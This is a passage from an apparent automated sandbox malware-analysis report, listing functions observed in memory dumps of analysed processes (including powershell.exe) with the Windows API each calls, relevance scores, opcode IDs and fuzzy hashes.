                                                    • Instruction Fuzzy Hash: A9F0A931504B44CFEB61CF05D989765FBA4EB44721F18C0AADD0D4B642D278A908DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0037A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 896fb10a5118a80b7f9475a35e86edb568a0b4d2b35e7d1c78510dedb5d81636
                                                    • Instruction ID: 8f7e79001271c9210232e040fa5fab0aae110f88f1af11a2bb2244f85353ace4
                                                    • Opcode Fuzzy Hash: 896fb10a5118a80b7f9475a35e86edb568a0b4d2b35e7d1c78510dedb5d81636
                                                    • Instruction Fuzzy Hash: E81191715093849FD712CB25DC45B96BFA4DF42220F0980ABED898B252D275A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 0037A9C8
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117701970.000000000037A000.00000040.00000001.sdmp, Offset: 0037A000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 5a5ccd17bc5bfc3025b8b35374f2e5e0e199731492359eafa9ef15dc9d7decfc
                                                    • Instruction ID: 090a0351f0dbcafaf11aa739f5b7d2d39a9d766540ffa06e5f9d869b6bf2c342
                                                    • Opcode Fuzzy Hash: 5a5ccd17bc5bfc3025b8b35374f2e5e0e199731492359eafa9ef15dc9d7decfc
                                                    • Instruction Fuzzy Hash: 2801F271600B44CFEB21DF25DC857AAFB94DF41320F18C0ABDD098B642D779A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 027F0861, Relevance: .0, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2122156471.00000000027F0000.00000040.00000001.sdmp, Offset: 027F0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62d746ebff41ed19b4b23a6efbe09314ef42a8c581711d8c95221937eccfc67b
                                                    • Instruction ID: 6ed5aef3f1e15894e6abe61a8a7c7be2eb0bad2f5b9e79b0c535aa6ba48aa028
                                                    • Opcode Fuzzy Hash: 62d746ebff41ed19b4b23a6efbe09314ef42a8c581711d8c95221937eccfc67b
                                                    • Instruction Fuzzy Hash: 89F0391110E7D11FC3074724686049ABF729D8712431E81DBD485CF6A3DA484C4AD3B3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0286081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2122239669.0000000002860000.00000040.00000040.sdmp, Offset: 02860000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d0f50b9bc8a279d7fc26dea657f3e6549a91745f2af6e835d6b1fe68887205b
                                                    • Instruction ID: b1ded0151cc2bf337efbabf81363ef5d73beff5cc8d6cf6b89b5965d7ddde8e9
                                                    • Opcode Fuzzy Hash: 4d0f50b9bc8a279d7fc26dea657f3e6549a91745f2af6e835d6b1fe68887205b
                                                    • Instruction Fuzzy Hash: 8BE092766007008FD750DF0AEC41452F794EB84A30B18C07FDC0D8BB01D635B508CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003723F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117656201.0000000000372000.00000040.00000001.sdmp, Offset: 00372000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fbef12ae86027e62b9c0d768c34cd34a50372bd34a9d3a0f5e93b67a304e8cd8
                                                    • Instruction ID: 14438df405f6c7b09f02ff9eded678495c3c3029dc030c513177019b68dce4e5
                                                    • Opcode Fuzzy Hash: fbef12ae86027e62b9c0d768c34cd34a50372bd34a9d3a0f5e93b67a304e8cd8
                                                    • Instruction Fuzzy Hash: 70D05E79204A818FD7278A1DC1A4B963794AF55B04F4784F9E844CB6A3C768E981D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003723BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2117656201.0000000000372000.00000040.00000001.sdmp, Offset: 00372000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b9845344df46ffb88ab2519661a55a5ab678e2e9167d6625c165fc7b5f2b487
                                                    • Instruction ID: 60de2df0fb43c7bb705d098cda926c4a63ed2e4ba1dd789cdd8da65d7a3449b9
                                                    • Opcode Fuzzy Hash: 5b9845344df46ffb88ab2519661a55a5ab678e2e9167d6625c165fc7b5f2b487
                                                    • Instruction Fuzzy Hash: 3BD05E383006818FEB26CA1CC194F5A73E4AF40700F0684ECBC008B266C3ACE880C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2300 Parent PID: 2336 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 01F1ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F1AD37
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 129dd658116ab14785c4e56acb4a0d9348fd62ee5d08a255d34afb589297d20d
                                                    • Instruction ID: b31cd786830906a9e1ec1293cf89a5627c1c4b874d7afc7ba80aa6d8ece681a3
                                                    • Opcode Fuzzy Hash: 129dd658116ab14785c4e56acb4a0d9348fd62ee5d08a255d34afb589297d20d
                                                    • Instruction Fuzzy Hash: E6219C765097C49FEB238F25DC44B92BFB4EF06210F08859AE9858B563D271A908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01F1AD37
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: 8092736f63521e0505c839f596be7da38a4d2feccc2a459edc4e2e9a48be8c52
                                                    • Instruction ID: 8202d46ad7026ea5e853c50bc5b1d70a68545cebf3ef14788df0420fa653832c
                                                    • Opcode Fuzzy Hash: 8092736f63521e0505c839f596be7da38a4d2feccc2a459edc4e2e9a48be8c52
                                                    • Instruction Fuzzy Hash: 2711C276500B40DFEB21CF55DC84B56FBE4EF04221F08C46AED498B626D332E414CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F1B329
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 4411518c4a4a37884932e9639c239126237bbd90fb3381ca53fe4d81519a8cf6
                                                    • Instruction ID: 003f69fa3d9ff30c57752bd17e2d8514b3b38b9526907b0bbbf46041fcb44adb
                                                    • Opcode Fuzzy Hash: 4411518c4a4a37884932e9639c239126237bbd90fb3381ca53fe4d81519a8cf6
                                                    • Instruction Fuzzy Hash: BE11A071508380EFDB228F15DC45F52FFB4EF46220F09849EED844B663C276A818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01F1B329
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 8fd5eed2280344c52e58d3bbccff4401afdb65ce61dafc934c3d0cffcb60e593
                                                    • Instruction ID: 89bc7474831e5ab4120d6bafe4978dcac49d99c15a893baddc958d6d05c77a48
                                                    • Opcode Fuzzy Hash: 8fd5eed2280344c52e58d3bbccff4401afdb65ce61dafc934c3d0cffcb60e593
                                                    • Instruction Fuzzy Hash: B901AD36904740DFEB218F49D885B21FBB0EF04721F08C19ADD894B616C376A428DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028801D0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 3a69c97a8b08f7ba0ede7a3fce46955e02d12b49db87b730b351501500b611e8
                                                    • Instruction ID: 7e182e3f379736c3426016d21feff40044c913e4af94c8b4d64f334ac6c764cd
                                                    • Opcode Fuzzy Hash: 3a69c97a8b08f7ba0ede7a3fce46955e02d12b49db87b730b351501500b611e8
                                                    • Instruction Fuzzy Hash: 6D313A6950E3C08FE7138B759C65691BFB4AF43220F0E84DBD8C4CF1A3D6659809D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 5f8bb747cf19950f2cfd397c7e620b14bca3aa8d6375607f072b8543a8812e4f
                                                    • Instruction ID: 43180b634ce9f249fa680a829682845e94ef305cd4a49873b98c29c6ec733785
                                                    • Opcode Fuzzy Hash: 5f8bb747cf19950f2cfd397c7e620b14bca3aa8d6375607f072b8543a8812e4f
                                                    • Instruction Fuzzy Hash: C0317075505380AFE722DF65CC45F52BFF8EF05210F09849EE988CB293D325A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 732d193a00a04229424a7872fea682c2f415140c85ef4361f384a4458a47aa21
                                                    • Instruction ID: ebb8f62b548a52bb9038659096b459911b86f6ab8ab1bcc748dc509cfe537694
                                                    • Opcode Fuzzy Hash: 732d193a00a04229424a7872fea682c2f415140c85ef4361f384a4458a47aa21
                                                    • Instruction Fuzzy Hash: 5531C875509380AFE712DB25DC45B96BFE8DF06314F0884AAE988CF293D375A909C772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 5dd648a6ba2566f795528d2811f2a2c9cc45e3af5d0405a464e533b1967f2703
                                                    • Instruction ID: 10dbbec2beac802b0b6574ab1919093de1fb0afd2dc4169d9c8d47ab2cbff3e9
                                                    • Opcode Fuzzy Hash: 5dd648a6ba2566f795528d2811f2a2c9cc45e3af5d0405a464e533b1967f2703
                                                    • Instruction Fuzzy Hash: 6A21F6B2509380AFE712CF60DC45B96BFB8EF06320F0885DBE984DB193C225A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: d5f9300414d37df37f9f22274e98672006e81845e739ea2cd46c03cea996fd31
                                                    • Instruction ID: 8ada4522f18a4edca83f4496bcf0bac3ce0e81fcd83b92569a05d9c14bd2ecde
                                                    • Opcode Fuzzy Hash: d5f9300414d37df37f9f22274e98672006e81845e739ea2cd46c03cea996fd31
                                                    • Instruction Fuzzy Hash: 3B319372509380AFE722CB61DC55F96BFB8EF06210F0885DBF985DB193D225A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0288109E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 60d29139ca2f0e27951c2432a26d78d8607fcddc612e05d3ff07d45359edd74e
                                                    • Instruction ID: 601072dfdb224a48fa0cdbe040229fa6ff99b1d0f7e2ccd6eff944d3fece607e
                                                    • Opcode Fuzzy Hash: 60d29139ca2f0e27951c2432a26d78d8607fcddc612e05d3ff07d45359edd74e
                                                    • Instruction Fuzzy Hash: 30316F7550E3C0AFD3138B358C55B56BFB4AF43610F1A81DBD884CF2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A1A8, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01F1A23E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 27c91510fe04d4c659a6afbaa441b5ff2cc3de4a5b231b0ad5778492eb85f04d
                                                    • Instruction ID: c3e5a599bbc4901dd388131c1d24b2e25fb152b15335b76ea647ee8ee5054831
                                                    • Opcode Fuzzy Hash: 27c91510fe04d4c659a6afbaa441b5ff2cc3de4a5b231b0ad5778492eb85f04d
                                                    • Instruction Fuzzy Hash: 9A21D27150D3C06FD7128B618C55B65BF74EF43620F1981DBD884CB593D229A919C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: d06e9765ce779c94470cde286e144374b816282b9db68cd9d0c449697de51067
                                                    • Instruction ID: 5dd6748aa17624a6d9ec01345e6b00702575830114a6eff8ef24f0fd29bff809
                                                    • Opcode Fuzzy Hash: d06e9765ce779c94470cde286e144374b816282b9db68cd9d0c449697de51067
                                                    • Instruction Fuzzy Hash: A721A371509380EFE722CF15CC45FA6FFB8EF46220F08849AE949DB192D665E948CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 02880819
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 7cc4f46df6dd2e3af15c58d45302746a92085544663071acba0d6360eaf2995b
                                                    • Instruction ID: ea89ec53f9ab91fcf5e5aeabea60d88a438f8c9a6ae08599d26f304b7f325835
                                                    • Opcode Fuzzy Hash: 7cc4f46df6dd2e3af15c58d45302746a92085544663071acba0d6360eaf2995b
                                                    • Instruction Fuzzy Hash: E421C876508780AFE712CB159C45BA3BFA8EF46720F0981DAE9848F193D224A909C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02880502
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: cc44a14c19fb55ecfb83afe84ceb75ea789634bb1ceaf0b267cdfb75a917285c
                                                    • Instruction ID: 8f8ce5ca1ca9a2a630d6d3c5e65b3777da0b1c379a6774cdd99b1643cd3c9a8d
                                                    • Opcode Fuzzy Hash: cc44a14c19fb55ecfb83afe84ceb75ea789634bb1ceaf0b267cdfb75a917285c
                                                    • Instruction Fuzzy Hash: 6C216D7550E3C0AFD3128B658C55B62BFB4EF87610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028806AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0288072D
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 344463cfaff39df2b33dcc8da98b00d22fca529faa6dfcb801cf0ab1feb3b581
                                                    • Instruction ID: 8d58ebce546b2d31932f69e24aa6d5070fa7b458b65765d3860561f73ac0bf8b
                                                    • Opcode Fuzzy Hash: 344463cfaff39df2b33dcc8da98b00d22fca529faa6dfcb801cf0ab1feb3b581
                                                    • Instruction Fuzzy Hash: F421A179500704EFE720EF65CC45F66FBE8EF08250F04846AE989CB292D731E808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 028808E5
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: ab64c33078e8d5aaaa2bc7d528eca80b1b39f037d515a9f3274ed16793db6de4
                                                    • Instruction ID: 86a2f02daa8f9be39c2a5def9a5212c399ce2f857dfa4942e5ff2fcf5f707c74
                                                    • Opcode Fuzzy Hash: ab64c33078e8d5aaaa2bc7d528eca80b1b39f037d515a9f3274ed16793db6de4
                                                    • Instruction Fuzzy Hash: 9521B275409380AFE722CF51DC45F56FFB8EF06310F09859BE9848B153C225A909CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1A8B4, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VerLanguageNameW.KERNELBASE(?,00000E9C,?,?), ref: 01F1A94A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageName
                                                    • String ID:
                                                    • API String ID: 2060303382-0
                                                    • Opcode ID: 21f64392e486b1f5296866e697702e267494d293c75c6d36d9bec8bd88b036f2
                                                    • Instruction ID: 2c2894aadb32ceaa73185b5b6ffe8881e7fe509134b8de97f059f5e96a864186
                                                    • Opcode Fuzzy Hash: 21f64392e486b1f5296866e697702e267494d293c75c6d36d9bec8bd88b036f2
                                                    • Instruction Fuzzy Hash: AB219575509780AFD3138B259C51B62BFB4EF87610F0981DBEC848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02880DD6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: 17cf2a3807f4daf691075d3ab09c7a9b308c8b674314a03b17df6eadc3f2223c
                                                    • Instruction ID: 2519f3118fb81eb6b1262d93d0418cf3cbc6e56d32fa6630291b7e06278cd266
                                                    • Opcode Fuzzy Hash: 17cf2a3807f4daf691075d3ab09c7a9b308c8b674314a03b17df6eadc3f2223c
                                                    • Instruction Fuzzy Hash: 3921A175600244AFF720EF25CC85BA6FBD8EF04254F04856AEC48DB282E775F908CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 0a6a0c4fb7129417e4dc5e03dea0f4b8f8299901625717d4765b0879ae8e43da
                                                    • Instruction ID: 75d60e6f2de45da7d391fde3219aa86d426eb300b4fa18a21fb918fbc799e271
                                                    • Opcode Fuzzy Hash: 0a6a0c4fb7129417e4dc5e03dea0f4b8f8299901625717d4765b0879ae8e43da
                                                    • Instruction Fuzzy Hash: B211AF72500304EFEB21CF55DC85FAAFBACEF04320F04856AFD49DA141D675A9048BB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02880F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02880FB0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 51de106715299d80f38ec8f640a5ebcc9fd683f83bf4dac35dd90e16d085e9b3
                                                    • Instruction ID: 5c620f3e8167fbb4df9f4414235b5780326416cd10e4971295bddde35be1c227
                                                    • Opcode Fuzzy Hash: 51de106715299d80f38ec8f640a5ebcc9fd683f83bf4dac35dd90e16d085e9b3
                                                    • Instruction Fuzzy Hash: FF215B7550D7C09FDB128B25DC55B92BFB4AF03224F0D84DAE988CF693D2699808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0288137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2123933023.0000000002880000.00000040.00000001.sdmp, Offset: 02880000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 5ac86de689577e59215458f9bb48dc6f6082361643d4ea0d82827a7b2b7eb34c
                                                    • Instruction ID: 9523f24484200c80e06d28b489934675d69c91e3c4bb99226388072262edbab3
                                                    • Opcode Fuzzy Hash: 5ac86de689577e59215458f9bb48dc6f6082361643d4ea0d82827a7b2b7eb34c
                                                    • Instruction Fuzzy Hash: 0C219F765083809FEB21CF25DC45B96FFB4EF06220F0884AEED898B562D335A449DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,71CB3989,00000000,00000000,00000000,00000000), ref: 01F1B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: 3aba03a254613af606f2dad4ee369cc41d4f1b12d410ffb6afa4ff81fbaae04e
                                                    • Instruction ID: 7f9288339384afa2909076077f84fcf27d7b4aa2426314a0bd38dba11bd51833
                                                    • Opcode Fuzzy Hash: 3aba03a254613af606f2dad4ee369cc41d4f1b12d410ffb6afa4ff81fbaae04e
                                                    • Instruction Fuzzy Hash: E911B172600300EFEB20CF15DC85FA6FBA8EF04260F04846AED09CB245D675E9448AB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01F1BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: 46918be3055f7723d42755560530c04617bebb8fd34a6f43940a69439c1d0108
                                                    • Instruction ID: c7cb4298b4caca94f8ff9d9c31a726db76cae5dd18b7a162dc511309fbcdd4dc
                                                    • Opcode Fuzzy Hash: 46918be3055f7723d42755560530c04617bebb8fd34a6f43940a69439c1d0108
                                                    • Instruction Fuzzy Hash: E4219F765093C09FEB12CB25DC55A92BFB4EF07320F0D84DADD858F263D225A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01F1AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01F1AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2120177840.0000000001F1A000.00000040.00000001.sdmp, Offset: 01F1A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 52c7a3d42c8dda1085d23869d9274de377c033dbe433b7b3c0315b251b9284e8
                                                    • Instruction ID: 42dc7c239647082e4015066ebae4e32a02d63143864c5c1eb2771964625e4b92
                                                    • Opcode Fuzzy Hash: 52c7a3d42c8dda1085d23869d9274de377c033dbe433b7b3c0315b251b9284e8
